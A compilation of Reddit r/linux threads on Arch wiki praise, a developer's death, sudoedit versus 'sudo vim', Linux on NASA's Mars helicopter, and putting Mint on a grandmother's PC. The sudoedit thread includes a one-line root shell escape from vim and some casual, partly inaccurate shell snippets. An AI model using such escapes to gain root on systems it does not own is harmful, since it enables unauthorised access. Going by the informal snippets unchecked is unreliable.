When you use open sources software that were built for Linux, you'll get the great experience of using open-source and free software. And there is something bigger than Linux, it is the open-source philosophy. Linux encompasses that philosophy well but I encourage you to switch to open-source variants of the apps you use. And contribute to the open-source movement.
[removed]
[deleted]
[removed]
[removed]
The world of software speaks different languages.

Windows controls one language, Mac another, Google another.  All want you to speak their language so you only buy their software. 

Open source software has no language requirement. Linux is the space where every can speak freely.
i think in layman's terms - it's a suite of programming projects that form a desktop operating system where anyone can partake in development and the openness of the system means it's free of user-tracking (telemetry) and ads.
There really isn't much that is more rewarding than diving into how computers work.
Becoming a power user eventually can even lead to job opportunities. Give it hell. Cheers
Hopefully this short TED talk can clear up some things! 

&#x200B;

[https://www.youtube.com/watch?v=xfBWk4nw440](https://www.youtube.com/watch?v=xfBWk4nw440)
I find it interesting you say the pc he got is relatively expensive compared to mac (apple isn't exactly known for its low price to computing power ratio. The reason your bf is so hyped about Linux (why many of us are) is because it is entirely developed by one guy (Linus Torvalds) and the community that uses it. It is open source, meaning that anyone has access to the very code it was written in (it's licence actually demands that it is). In a closed source application the owner only distributed a compiled executable. Basically just a pile of computer-readable binary code. Now decompiling is possible, but hard, and there is a lot of things one can do to make it more difficult and less succesfull. 

When programming, you have languages to your disposal. Now their use is to make your life easier by just giving you relatively human readable standards in which you can issue commands to the computer.

Now what your bf refers to as Linux is actually just a very low level part of your operating system, all the actual user applications that you use run on top of that. And this is where "distributions" come in. Distributions essentially precompile Linux for you but include a bunch of their own programs like a desktop environment (the component that actually gives your system a graphical part to interact with) and an installer so that you can just plug in a simple data drive and then go through a menu to get your system all set up.

These are some basic concepts I've tried to compress into short explanations here, hopefully you can understand them a bit better, and please do ask if something specifically doesn't make sense to you.
You should get worried if he admits he visits unixporn. There are some wicked pictures there.
I'm not an Arch user, but I want to send a shout out to the Arch wiki and all of the people who maintain it, because it's awesome.

It seems like almost every time I go out and search for a solution to some Linux problem I've got lately, the Arch wiki comes up, and even when it doesn't have a solution to the problem I'm having, it often has useful information that gives me guidance into where/what I should be looking for.

The wiki pages are often high-quality and are the right mix of verbosity/terseness so that I don't feel like I'm reading some click-bait article that was just written to meet a word-count quota.

So, thank you Arch wiki for being awesome, and thanks to the people who have been working on it.

It is indeed awesome (disclaimer: not an arch user).

So, why does the Debian wiki suck so much, what's the difference in driving contributions?
80% of the time you go on there and realise some other poor fucker has had the same problem as you.
For those who use [DuckDuckGo](https://ddg.gg), the bangs `!arch` and `!aw` are for searching the Arch Wiki directly. It is pretty awesome!
Arch wiki is like documentation porn
Hey guys, I use Arch.

^^^just ^^^wanted ^^^you ^^^to ^^^know
From one such contributor: You're welcome! 

Keep in mind that outdated information (usually) doesn't stay in, so when a package or the kernel is updated with changes that fix an issue, remove a feature and etc, then we (I'm pretty sure at least about myself) remove or change the related ArchWiki pages accordingly, keep that in mind if you don't run the latest versions of the kernel and packages.
The Arch wiki is the deciding factor in me not switching to Gentoo. If you're gonna have a distro that needs a lot of maintenance, you're gonna want a lot of community support if you don't want to spend all your time debugging stuff in the most painful and meticulous way possible. (Not that Gentoo doesn't have a significant community, but my understanding is it's smaller than Arch's.)
The best things about Arch:

1. Its wiki
2. Its community
3. Its repository
4. The self-documenting Arch Linux usage statistics.

Seriously though, I wish I had more time and patience to spare for Arch. I can understand if the wiki + community + repository combined with feeling like you are building a setup from more bare metal than usual, and so feels more like "your own", is a special one not many others offer.
It would be awesome if the Arch wiki can be cloned and made all-inclusive with specific sections on articles related to specific distributions. A guy can dream, right?
Okay fine.

A long time Debian user here, but I'm going to install Arch today once I'm home. Or at least try to.
One of the reason why I switched to Arch. I used to use Ubuntu/Elementary OS, but every time I had a problem, a google search usually displayed the Arch Wiki with an article about the thing I had problems with. More often than not, I found something that sent me in the right direction. Some configuration file locations or defaults are different on Arch, but usually, they are also applicable on other distributions.

But sometimes they were not. I installed Arch for the wiki (as now, I can use every article without first checking whether it works on Ubuntu as well). Another reason was the size of the base install, and the way to install the packages you want. You can also do this with Ubuntu server, or some other distrubitions. But it felt natural on Arch, as it is the only supported way.
amen!!

signed: Happy arch user
Red Hat employee here.. and I will give the Arch Linux WIki props all the times.  It is definitely awesomesauce (or whatever you kids say nowadays).
Thanks contributors.
Very true. I've searched for super obscure things, and a lot of times I end up on the arch wiki. I've never used arch, but their wiki alone makes me want to switch
[deleted]
I also like Arch Linux wiki a lot, but as a Gentoo Linux user I contribute to the second one.
yeah, I agree. I've used Debian for many years and decided I wanted to push myself with something more complicated, or get out of my comfort zone. so I decided to look around and ended up installing Arch from base on my laptop and while it was a bit of a learning curve at first, the wiki has made it just as easy as it would have been to do the same with Debian. The community is also great and I found a lot of help over at the Manjaro forums too. 
*its
it's like the one and only exception to the "wiki is where information goes to die" rule
The Arch wiki was one of the driving factors to me switching to Arch. From the Ubuntu 6.x-12.x days, it used to the best user documentation. Then something happened and Arch took the throne. 

Thanks to all those that have made it such a valuable resource. 
I started using Void Linux, which I really like, but their wiki is quite sparse. I am **so** grateful for the great work of the Arch community on their wiki: any time I have a question, I head over there and read about multiple packages to accomplish any given task and how to configure it.
The ArchWiki saved the life of a lot of users here.

Hail ArchWiki!
Imagine how awesome it is for Arch users. I wish I could be a contributor, but every time I have something to contribute, it's already there. The people who maintain it are on top of things.
It truly is one of the treasures of the Linux world. Dammit, I need to contribute -- I use it so much that I've noticed holes I can fill. :)
It is indeed awesome 

Yes, I'm an Arch user.

I was a Gentoo user for a lot of years, and I also loved the Gentoo forums and the wiki.

Both are awesome, love you all!
Another situational great resource is the gentoo handbook. But yea, even in gentoo you go to arch wiki to see how something Works.
Wiki + AUR are the reason I quit distro hopping years ago. I do wish some of the more technical articles had a tldr section or broke things out to separate articles. Can't think of an example off of the top of my head, but some articles get into nitty gritty specifics on one feature on a "thing", when all I want to do is trouble shoot the "thing" at a top level.
I agree, not an arch user but their wiki is awesome. Come to think of it, I've never actually installed arch anywhere, maybe that's a new project.
Arch is life. Why don't you try it, you know the docs are good :-)
Hear hear!  I may not be an Arch user, but huge props to everyone who makes the Arch wiki such an excellent resource.
you are welcome

*I slightly changed two sentences that one time*
The Arch Wiki is without a doubt the best Linux resource on the internet. It's extremely rare that I come across an issue that isn't explicitly addressed somewhere within it
For Linux enthusiasts who complain that Arch is not practical, it is still worthwhile because it enhances your control skills and deepens your understanding of what is going on under the hood. Not to get all spacy on you, but it really is a beautiful world in Linux deep space. ﻿
I've been using Arch for a while, and at this point it's everywhere: on my work laptop, on almost all the machines at home (including a tiny NAS), and I've been loving it. Well, maybe  loving decreased a bit when systemd was officially embraced by the distro, but even that didn't make Arch less awesome in the end.

Also, totally agree with that the Arch wiki is amazing --- it's the one and only place where I find usable and complete answers all the time.
I use Arch as well. I've used it on my PC for about 5 years and we have a family PC which I used Arch on for the last year.

The wiki is great. Arch is a good distro as well.
The arch wiki is my first stop on support for any distro.  I barely touch arch anymore and it's still my go-to. 
Both Arch and the Arch Wiki are clearly labors of love.  <3 for all who contribute!
[removed]
I only use Arch on my laptop these days - I'm using CentOS on my server to study for my RHCSA, and Fedora is easier for my desktop - but I still use the Arch Wiki for basically everything I do. I obviously have to modify some things to suit the other distros, but the in-depth explanations for *why* I'm configuring something a certain way are useful anywhere. If it weren't for the Wiki, I'd never have gotten into Linux enough to want to make a career out of it, so I'd like to thank the contributors, too.
**[LINK](https://wiki.archlinux.org/)**
Amen! It's one of the core reasons that I even dared to install Arch Linux on my laptop. I was looking at some guides thinking "okay, but why does he do X?" and then I quickly found the Arch Wiki... everything became **so** much clearer.
The Arch Wiki is pretty great.  I've found a lot of information there that applies to *any* distro and it's helped me to solve a few issues over the years.
Yep, its pretty good. As someone who doesn't use Arch anymore, I still go there to read about stuff from time to time.
Yeah the Arch-Wiki is great, started using it, when I first installed Arch. I stopped using Arch-linux Distributions, but still use the wiki from time to time, even adding arch-wiki to my search request because it has great informations. 
[deleted]
> thank it's contributors

*its (possessive, not "it is")
There was a time when the ubuntu community wiki used to be good. (Somewhere around 10.04). Then by the time 12.04 and 14.04 turned up, almost everything there was outdated and useless.

The Arch Wiki is more or less always updated, like the distro.
It's what made me choose arch as my main distros many years ago
I knid of wish there were a seperate section of wiki for user community submission recipes instead of scouring the web for peoples blogs on howtos or tutorials. 


I'll never understand why the arch wiki is blocked where I work :(
I can't seriously consider arch until the base installation doesn't have six month old critical vulnerabilities.
... you have a mistake in your title.
I don't know. Ten years ago it was clear. Now it's text upon text upon text. Important text inserted between verbose irrelevant stuff - easy to miss. You cannot skim over and get a plan "ok, I'll have to do A, B and C" (with verbose text just explaining A, B, C). 

I guess I got used to actually good documentation like https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference or https://docs.microsoft.com/en-us/dotnet/core/index
Why aren't you an Arch user?

.n
The author of the KOI8-R, a member of the first FreeBSD Core Team, 
a contributor to SSH, Taylor UUCP, PGP, Elm, Tin, Lynx, NCFTP, ZIP/UNZIP, Less, a man who participated in the establishment of [Runet](https://en.wikipedia.org/wiki/Internet_in_Russian)... Andrey Chernov aka Ache died yesterday in Moscow. RIP. 

Sources (in Russian):

http://techquisitor.dreamwidth.org/315571.html

http://www.opennet.ru/opennews/art.shtml?num=47037

http://www.rbc.ru/technology_and_media/17/08/2017/59954c709a79472f3a76e9dc

https://meduza.io/news/2017/08/17/umer-avtor-kodirovki-koi8-r-andrey-chernov

https://www.linux.org.ru/forum/talks/13617685

http://www.interfax.ru/russia/575190

https://www.kommersant.ru/doc/3385768

http://www.novinite.com/articles/182385/Cyrilic+Creator+on+the+Internet+Andrey+Chernov+Died (in English).

https://sputniknews.com/art_living/201708171056539055-creator-cyrillic-internet-dies/ (in English).
I’ll admit I’ve never heard of him. But any one of those projects would be enough to earn my respect, let alone all of them. 
May he rest in working code.
I remember using some custom patched kernel in 2.6 times, the maintainer wasn't responding for some time on the forums, then his wife came in and said he fell off a ladder when doing some housework, damaged his brain pretty badly and is a vegetable now, he died some time later, she thanked everyone for support, this was pretty touching experience
[removed]
It's nice that this is getting a bit of press. Lynx, less, ssh,Zip/unzip,... Amazing projects to have contributed to. This guy helped the world in ways that most people will never even understand.
+++ RIP +++ 
RIP
Damn, how old was he? :(
The yet another said thing he was not that old. The pioneers pass away, but we will remember them forever. So long, Ache.
RIP! He will be remembered.
My heart aches for this loss. Andrey, you made the world a more free and better place. Your contributions to FOSS have changed the world. Code on, comrade, code on. 
I never heard of him personally but those are a ton of major projects and I can see he fought the good fight. R.I.P.
GNU Andrey Chernov
+RIP+

RIP Good Sir 
o7
RIP Ache.
RIP
RIP
RIP Andrey 
Gone but never forgotten. May he forever rest in the eternal changelog.
so whats going to happen when all these greats start dying off?  Most of them are getting up there in age.  
And now his watch is ended
Thanks for all his contributions and it is going to be remain forever. May his soul rest in peace.
I'm so sad imagining what his wife must be going through. 
RIP, Ache.
Sir Andrey Chernov, We will never forget your contributions for the free software community. RIP
how'd he die
Fuck
Rest in Peace.
RIP
RIP
It is always the good people die first :(. RIP. 
RIP
Very sad that someone who did so much died due to lack of resources.

It is too late for us to change this for him, but I wonder if this should cause us to ask how many others like him are out there.  Is there something we can do as a community to ensure this doesn't happen again?

I benefit from free software basically every day.  If a contributor to a project I use is ever in real need of something I can provide in return, I would love to have a way to find that out.

I hope that anyone seeing this in a similar situation will actively ask the community for help.  This isn't charity.  Your health is a mutual benefit for the people that use what you create.  Even if you choose not to continue your open source career, we are in your debt for what you have already created.
[removed]
**F**
F
RIP.  May he code forever on Free Software in Heaven.
TL;DR: title. It's to avoid exposing your system to vulnerabilities in your editor.

Hello all! Today, I want to adress one of my pet peeves : people using `sudo` to run their editors as root. This is bad because of two things :

1. It leaves your system vulnerable to any exploits involving your editor. You may also be prone to user errors.
2. But worst of all, it makes it so your editor ignores its configuration ! Your carefully crafted `.vimrc`, your beautiful `.emacs` config, all ignored !

Instead, set your `$EDITOR` environment variable, and use either `sudoedit file` or `sudo -e file`.

Thanks for reading.

&#x200B;

EDIT: So, what does `sudoedit` actually do?

It works in the following fashion :

1. It copies the file you're trying to edit into /tmp/file.xxx
2. It opens /tmp/file.xxx with your editor.
3. When you're done editing, it moves the tempfile back into the original.
I love these kinds of tips. I learned the Linux command line by research/trial & error 20 years ago, and at this point my own way of doing things is so ingrained and I'm so busy that I'm not bothering to change anymore.   I've known about $EDITOR for a long time but I'm going to actually switch to this method right now.
Huh, we used to have to do it the old fashioned way because `sudoedit` didn't exist yet.

1. cp $file $home/$file
2. vim $home/$file
3. sudo install -o $owner -g $group -m $mode $home/$file $file

I wonder if there's any concern about `sudoedit` using /tmp/ as a file store, since it's generally a globally accessible directory? Back when I had to do this manually (before I stopped having to use sudo so much), we used to get a lot of shit for using /tmp for anything.
Thanks for pointing this out. Been using linux for years and didn't know this was a thing. I just added this into my .bashrc file until I re-train myself not to go sudo nano all the time

    EDITOR=nano
    # Enforce safe file editing Practice
    function sudo() {
            if [[ $1 == "$EDITOR" ]]; then
                    if [ -w "$2" ]; then
                            command $EDITOR "$2"
                    else
                            command sudoedit "$2"
                    fi
            else
                    command /usr/bin/sudo "$@"
            fi
    }
        EDITORS=( nano emacs vim )
        export EDITOR="${EDITORS[$((RANDOM%${#EDITORS[@]}))]}"
Maybe interesting to mention: running vim as root enables a GTFO vector where you can simply :/bin/bash and exit the program on a shell with root privileges.
And if the file that you are editing happens to be either passwd or Shadow file, be sure to use vipw/vigr. These tools put the correct locking in place when you edit those files to avoid direct file corruption. There's a handful of tools around like that for other configuration files. Look for them and if you find them use them!
Are things like NFS ACLs and selinux contexts maintained when sudo shuffles the files around?
There is also the `$VISUAL` variable.
Don't even worry about this problem with vim.  Edit whatever you want and give one of these if it's privileged or read-only: 

`:w !sudo tee %`

Done deal.
You can use `vim (file)` as a normal user then save as root with `:w !sudo tee %`
You can edit sudo files on emacs without opening it on sudo mode
I was going to ignore this like a happy insecure `doas` user (ironic) but then I realized that my editor ignoring my config actually is pretty annoying. So the following should work for my other BSD fans

    cp "$1" /tmp/doasedited
    nvim /tmp/doasedited # (Use $EDITOR I guess is maybe better, I like nvim)
    doas cp /tmp/doasedited "$1" && rm /tmp/doasedited

EDIT: if you use this, test to make sure the second cp preserves file permissions right. I think it should because root is copying, but if it doesn't [this comment](https://old.reddit.com/r/linux/comments/osah05/ysk_do_not_use_sudo_vimnanoemacs_to_edit_a_file/h6nox7q/) is written by someone smarter than I so that `install` command should work for sure

If you misspell your password should be able to manually copy it (doas not re-asking for passwords is it's only truly annoying feature I think).

EDIT: actually I feel I should ask; what is the preferred thing to do when editing, say, `/etc/shadow` or other files a regular user shouldn't even be able to read? Copying them to `/tmp` seems actually worse than running editor as root. Should I just use `vi` or another smaller editor in such cases?
too bad i use \`doas\`
But bro, you are gonna mess up my Hack The Box privilege escalations.
Or use micro, when it doesn't have permission to write a file it asks if you want to write it with sudo
Unfortunately it does not save the changes into `undofile`, because you edit the temporary file only.
My sudo pet peeve is people that do `sudo su -`. Just do `sudo -i`.
Did you know that with emacs you can use tramp and open a file at `/sudo:root@localhost:/` and let it do the heavy lifting for you.

That means from the command line, if you have an emacs open with the server enabled, you can do this, too:

    sec () 
    { 
        case $1 in 
            "/*")
                emacsclient -e "(find-file \"/sudo::$1\")"
            ;;
            *)
                emacsclient -e "(find-file \"/sudo::$PWD/$1\")"
            ;;
        esac
    }
I tried this on Fedora Silverblue and got the error: 

    editing files in a writable directory is not permitted

Not seeing much about working around this online!
Thanks for the tip! I always hated that I had to use default vim whenever I edit privileged files
On a server or business system, I'll do that sure. But on my personal PC I'm just gonna type `sudo nano` tbh. Cause I'm lazy and its habit.
I am a little old school. I just "su -" before I do anything. 

At the risk of sounding old, back in my day Linux installs just came with the root account and no password. It was strongly suggested you set a password for root and create yourself a user account for doing normal stuff and leave the root account for doing system stuff. In case you are wondering what year that was, it was 1994. Fun times.
I like your funny words, magic man.
Nah but for real could you do tdlr for dummies?
Wow, I recently switched to sudo -E file simply because I like my environmental variables. Didn't know it was a security benefit as well. Thanks!
Amazing! Never knew about this, thanks!
Seems like it's going to be a pain if you want to save multiple times. Like, when you're tweaking a config.
[deleted]
Since switching to micro I dont have to worry about it ever again... its just using editor and if it needs sudo it elevates on save...
For KDE users : you can use kate without sudo, it will ask you for admin password when you'll try to save.

(this is how it should be : ask for more privileges only when needed, not when your app start)
two sudo pet peeves i have are this one, and the other is people doing 'sudo su'.
If you are curious how to do that do the following:

`export EDITOR="/usr/bin/nano"`  
`source /etc/environment`

Then you do not need to reboot.
Before I grokked the title, I thought this was going to be about editing `/etc/sudoers`. I screwed that up once and borked my system. I reinstalled because I didn't know about single user mode.

> [Because improper syntax in the /etc/sudoers file can leave you with a broken system where it is impossible to obtain elevated privileges, it is important to use the visudo command to edit the file.]( https://www.digitalocean.com/community/tutorials/how-to-edit-the-sudoers-file)
Really cool, thanks
my carefully crafted what now?
Been almost a year since I started using Linux and I had no idea about this. Thanks. So in essence it’s the same as what visudo does for the sudoers file except for the syntax check.
Thanks for sharing
There is also likely a plugin for writing the file you're working on out as su. I use Kakoune personally (highly recommend) and the sudo-write plugin is a beautiful thing
I was always mad about not having my configs transferred until I was messing with an Ubuntu install in a VM and I found out about this.
Oh, thanks for tellin
This is top tier content. Thanks for posting!
Thx! It definitely sounds like a good tip, it goes straight into my Linux notes.
I did not know, tx
Is there a good resource that covers these kind of things? I learned on my own and I know I've developed some bad habits along the way.
Wow.  This is a great tip.  I did not know this.

You might add to your post that you should use `visudo` when editing `/etc/sudoers*`.  It does a parse check on save so you don't accidentally lock yourself out of administrative rights.  The only way to recover is with a live USB.
I didn't know that I've been editing text files the wrong way all these decades. Never heard of `sudoedit` but that's cool to know.
Is the fact that the file is copied to /tmp/file.xxx not a security issue? A malicious actor could edit it there after you've saved it and thus edit the original file.
Is there something like this for `doas`?
Wow, this looks super handy. I always hate having my settings lost when I use sudo.
Thank you SO Much for this! I had no clue I was doing it wrong this entire time. I setup that variable. Appreciate you!
Thanks, this is great. And i wasn't even aware, that it existed. Most tutorials show this the wrong way.
Great tip that I'll employ from now on.

In Ubuntu 18.04/20.04, and likely it's derivatives, the default editor needs to be set. Just setting `$EDITOR` and `$VISUAL` is not enough; at least, not in my testing just now.

`sudo update-alternatives --config editor`

Select your editor of choice. Then `sudoedit` will use that editor.
Dear sir,  


You just changed my life.  


Thanks.
But can I make `sudoedit` actually write the file each time I save it? I often don't get the changes 100% right the first save and it'd be nice to keep the editor open

Edit: According to https://unix.stackexchange.com/questions/90866/sudoedit-vim-force-write-update-without-quit#90871 this requires me to do some DIY inotify stuff
>it makes it so your editor ignores its configuration

I'd guess it uses the configuration for root, when you start it as root.


I don't use sudo at all. The normal su has always been enough on my lonely single user system. No use for added complexity.
You’re not the boss of me! 

Me, a professional, editing a file in prod as someone who doesn’t have write permissions:  ah hell, just `sudo vim <path to file>` instead
I use sudo to run my editor and will keep on doing so. I do this because of two things:

1. I love leaving my system vulnerable to exploits.
2. I love it when my carefully crafted .vimrc is ignored.

As a bonus: It is your pet peeve, and I love it when I do stuff that annoys people.
C-x C-f /sudo::/...
Is there a definition for a "tinfoil hat attempt"? Because this is pretty much it.
I mean, not saying that your tip is wrong or w/e... but that its completely unnecessary for most users. While you could just... you know... restore your backup in case something bizarre/"one in a million" happens with your GNU slash Linux distro.
What vulns does vim or nano have lol?
I'm used to running `sudo -E micro` when dealing with anything outside my home.
[removed]
tysm💕
im root tho
A tiny tutorial would've made this post more perfect.
Can you point to a tutorial for setting this up?
Sudo is bloat. Use doas
I just run visudo, which runs $EDITOR
Does this apply to root in general or just sudo?
Since I do have a habit of executing `sudo vim`, it'll be hard to change my muscle memory. Is there a way to prevent execution of vim directly by invoking `sudo` or something similar?
With emacs, you can just use tramp anyways.
Plus (at least for me using Wayland) I can't use "+y to copy
You sir were the most useful person I read today. Thank you.
Dankon for the great tip!
well im using doas not sudo so ....
This is cool…but doesn’t that apply to sudo anything?
Wow, thanks! This is awesome! I've been using Suda in NeoVim for quite some time for this.
How to do it?

Edit: [Nevermind.](https://linuxize.com/post/how-to-set-and-list-environment-variables-in-linux/)
Did neovim fix this problem because they removed nvim -Z and sudoedit is the same as sudo nvim now

I thought it was strange, but I did not check if it created a temp file
Good! How do I set the variable?
Oh yea, I made that mistake two days ago, had to reinstall everything ‘cause I messed everything up :P
Didn’t know this was an option.. but I copy my vimrc to my root so no issues there.
How do I set my Editor
>Instead, set your $EDITOR environment variable,

How does one do this part? Say, for Nano.
[removed]
> But worst of all, it makes it so your editor ignores its configuration ! Your carefully crafted .vimrc, your beautiful .emacs config, all ignored !

For this reason I symlink `/root` to my home directory.  No idea if this is a good idea, but it solves the config problem.
Is that how crontab -e works?
I trust my `nano` more than `sudo` tbh. Especially after `sudo` had a major security vulnerability related to *this specific feature* so recently:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3156
Personally not worried about doing this. It won't save you if the attacking party gains root access from another exploit. Would rather use a visual editor like Kate or Notepadqq that asks for root writing permission.
Does this only work with sudo? What's about doas or pleaser?
No!
I added `export EDITOR="/usr/bin/nvim"` to my `.bashrc`, but it doesn't work. After this change, `sudo -e .bashrc` returns `sudo: .bashrc: editing files in a writable directory is not permitted`. What did I miss?

**Edit:** I also tried `sudo update-alternatives --config editor` and picking nvim without succes.
I was going through this wondering what the implications were but not having your config is reason enough. Right now mine's vanilla but it's something to remember. 👍

Maybe basic but ctrl+a is awesome while we're on the subject of sudo and how often it's (sometimes) forgotten.
all 'nix admins I know do 'sudo su -' as soon as they log in.  


Opening anything in /tmp as sudo/root as a security flaw because /tmp is world writable and executable. Although unlikely, newly created files in /tmp could be hijacked.
Okay, I added 

    EDITOR=emacs

to my `~/.profile` file and sourced it so that I get

    $ echo $EDITOR
    emacs

However, when I use `sudoedit file` or `sudo -e file`, the file still opens in nano.  Am I doing something wrong?
Great tip, thanks!
Y'all still manually editing privlaged configuration files?  I think the security concerns run deeper then potential vulnerabilities in the editor at that point.
cp /etc/file.config \~/

vi \~/file.config

sudo cp \~/file.config /etc
[deleted]
***I just copied my .vimrc to /root and I'm happy sudo vim user***
It's mentioned at the end of [this IEEE Spectrum article](https://spectrum.ieee.org/automaton/aerospace/robotic-exploration/nasa-designed-perseverance-helicopter-rover-fly-autonomously-mars) about the Mars landing.

> **Anything else you can share with us that engineers might find particularly interesting?**

> This the first time we’ll be flying Linux on Mars. We’re actually running on a Linux operating system. The software framework that we’re using is one that we developed at JPL for cubesats and instruments, and we [open-sourced](https://github.com/nasa/fprime) it a few years ago. So, you can get the software framework that’s flying on the Mars helicopter, and use it on your own project. It’s kind of an open-source victory, because we’re flying an open-source operating system and an open-source flight software framework and flying commercial parts that you can buy off the shelf if you wanted to do this yourself someday. This is a new thing for JPL because they tend to like what’s very safe and proven, but a lot of people are very excited about it, and we’re really looking forward to doing it.

The F' framework is on GitHub: https://github.com/nasa/fprime
My god, it even depends on Python 3, not 2. Brings a tear to my eye
Linux milestones: 

 - Mars: ✓
 - The desktop:
> if you wanted to do this yourself someday

Hey, I *just might* want to send a rover to Mars myself someday. How'd they know?
> If everything goes according to plan, Ingenuity will become the first aircraft to fly on Mars. ... This the first time we’ll be flying Linux on Mars.

Not just the first time Linux is flying on Mars, but the first time anything man-made is. That's pretty damn cool.
Every long running series eventually has to do the "but in space" gimmick.
Also, did anyone notice the UI for the "mars viewer" interface that sometimes was visible in the stream? It looked like some kind of old motif UI toolkit
I can't believe they can get a helicopter to fly in that super thin atmosphere.
Further confirmation that we Linux users are cool as hell😎. 

In all seriousness, this genuinely gives me great pride. I watched the livestream of the landing yesterday and during it I was hoping to catch a glimpse of perhaps someone using KDE, or something, on their desktop. But hearing that the helicopter drone they are going to use on Mars is actually running Linux as it's OS is soooo much cooler.
If it had Windows, it would've crashed!
It's final tasks will be running Doom and an NES emulator.
Weird that they used Linux, its pretty unusual to run Linux on such systems. Even the best Open Source Drones here on earth don't run Linux (they run FreeRTOS or NuttX).

And because the Rover uses VxWorks id would assumed that they use that too for the Helicopter.
any idea if they're using a specific distro as a base vs rolling their own?
How many spacecraft use Linux?
Wifi card won't turn on for some reason...
Is curl, too?
If my ass is in a spacecraft going ten miles a second, and I have the choice between Linux and billywindows to run that spacecraft, I'm pretty sure I don't have to state the obvious.
The label 'linux in the wild' seems inadequate for this situation.
> This the first time we’ll be flying Linux on Mars

what the mandela?

i am 100% there was another rover running RHEL a few years ago
This is so cool!
is that a message for no Windows licenses on Mars? hehe
Wait until it tries to run `apt-get update`
The framework uses *Python*?

I assumed they'd only go for compiled stuff. Like when they have to, and go or rust.
I'm happy to learn this but at the same time if helicopter should fail for any reason I really really hope it's not a software area.
Awesome news! I didn't know and I was really excited about this news!

It is generally a great mission! I watched the live broadcast with great enthusiasm.

&#x200B;

Thanks for this wonderful news!
Of course Android (most used OS on earth) is Linux
We shipped the binary, but did we also ship the sources as the GPL implies ?
This is so cool.

I'm just curious about the clock. Is Linux capable of using other clock than the earth one? A day in Mars is not a day here... How does crontab runs?

Seems like another metric/imperial scenario for disaster :) "I don't know why it's crashing every 12 hours, the cron is fine!!"

Also I assume that this is not a linux only problem, vxworks must have the same problem. For example if they add exit data to photos do m what date do they add? Do they use JPL's time and call it a day? (No pun intended).

Edit: so I did a little research: https://en.m.wikipedia.org/wiki/Timekeeping_on_Mars
The F framework?

"What kinda software should we use on the flyer?"

"I dunno. F it."

"You got it!"
Right. 
Linux better find it's way to Mars. 
We need an open sourced Windows.
Which we might find in heavens.
We made it people, linux on Mars 🦾
We made it people, linux on Mars 🦾
Probably Debian, right?  I mean it is The **Universal** Operating System - and it's already very well made it at least to ISS.

;-)
linux lands on mars but can't video decode in browsers.
This is so cool xD
I really hope that space exploration is as 'open source' as it can get. 

It could easily become a free-market wild west, and a dictatorship soon after that.
This is not the first time Linux touched the red planet. Opportunity and Spirit was also using Linux back in 2004.
That's wild
I like your shot, friend.
Martian Penguins will be happy
What version of linux kernel is it running?
[deleted]
This gives me chills. Maybe this means the first habitats will all run on a variant of our favorite OS.
Another reason why Linux is superior.
Wanna bet they didn't use systemd?
My 83 year old grandma was using a virtually unusable late 00s E-Machines computer that still was running Windows Vista. All she ever does is check emails and google occasional recipes so I installed Linux Mint Cinnamon on it and she called me today to thank me for installing “such a fast version of windows on it.” She also loved that I made her wallpaper a photo of her youngest grandson, which she was surprised I could do :D

Just a reminder that Linux is a great option for grandparents
"fast version of windows" lol.
This is a perfect example of some of the best use cases of Linux.

Liberating old hardware from arbitrary EOL support, by reusing it with a honest, optimized alternative.

Also, great job choosing Linux Mint Cinnamon, I love that distro too. :)
Definitely a good choice for people who know nothing of computers. I installed it to my aunt and she's got brain damage from a tumor so she does not understand a lot of things. She's been running manjaro  xfce with firefox on her old laptop, never called once and is still super happy with it. All she does is play some browser games, online banking and emails. With Pamac, she can easily update all the programs.
Yes! Migrate all the grand-parents to Linux and we will raise the percentage of Linux user by a lot!
Did something very similar for my now 69 year old mother-in-law at the start of the pandemic. Her windows 10 install had become so bogged down on a spinning 1TB HD. Life being hectic in those early days, I threw in an SSD and installed Ubuntu Desktop. She mostly does email, social media, and video conferencing with family and her social groups. Took to it like a duck to water. Have remote access setup so I can securely remote into it to run the occasional updates, and she knows how to start and stop that functionality. 

And it’s great because I can say to my wife, “Your mom runs Linux.”
My mom was a Linux grandma for over 10 years! Heard me talk about it for a long time, until one day she just got fed up with Windows and asked to try it. I installed a dual boot for her and she never never went back to Windows.
Long time ago, my father finally decided he needed a computer, so he asked me to build him one from spare parts I had lying around. 
Of course, he wanted windows installed. The conversation went like this: 'ok, you have two options, go out and buy a retail copy of windows and ms office, and ask Microsoft for help when something fails, or let me install Linux and be your tech support for free'.

Thanks $deity, he chose Linux.
You are the hero we need in the world my friend!
I had done the same to my grandparents computer. They basically use it for watching movies, scrolling through Facebook and finding recipes and such.

They love how fast it became. The only problem is sometimes the hard drive gets corrupted and I have to run "fcsk" manually instead of fixing itself automatically. That's annoying
Exactly the same case with my mother-in-law. She had an old laptop that took ages to start up (she started the thing and in the meanwhile would do house errands). Ok, she uses email and YouTube, so before buying a new laptop we have a try at Linux. Now she has a decent laptop that will last a couple years more (at least).

And several years ago it was the same with my brother. Sort of old PC that was slow as hell. "why don't you give a try at Linux before buying a new one?". And several years again, and after buying a new computer, he's still using Linux.
My grandma use arch btw
Yes, Mint is a fast version of Windows haha. I love your story. Well done.
Yup, I'm a grandparent and I have Linux on my desktop, laptop and both of my web servers.
Almost grandparents here, too. I’m running Ubuntu 20.04 headless on all 4 nodes of my K8s cluster and an nfs server. It’s just a home lab I’m using for learning, and I’m having a great time… also hoping it’ll stave off dementia.
I installed Linux on my dads old laptop for him about a decade ago and he was like “oh god why did I ever pay for that other garbage?”
This is more uplifting than the entire r/UpliftingNews sub.
Not all heroes wear capes o7
What an awesome grandchild you are! <3

(My elderly father-in-law, before he passed, used Linux for... well about 5 years after his old Windows install basically attracted all viruses on the planet, and just didn't work at times)
I installed Linux Mint years ago on my 83-year old fathers computer. Although I think in a few years I'll have to upgrade. The main pain-in-the-ass was the installation of his old HP printer and scanner, took me a day or so, had to manually copy some files if I remember correctly.
Very glad someone did my [meme](https://www.reddit.com/r/linuxmemes/comments/q8reys/i_got_you_grandma/?utm_medium=android_app&utm_source=share)
Yeah grandma, it's XP Extremely Light Edition xD.
Cracks me up that she said "fast version of windows" lol.
[deleted]
Yep. Installed linux on my mother's computer and she is happy with it.
Grandma can use Linux but Linus…….nope.
This is really nice. I recently installed Linux on my grandmother's old laptop because it was having terrible issues due to not being able to update no more and because the GPU drivers were messed up. 
She only uses email and Facebook so it's perfect, still didn't hear a single issue since then.
My grandpa has been using KDE Neon for over a year now, he loves it!
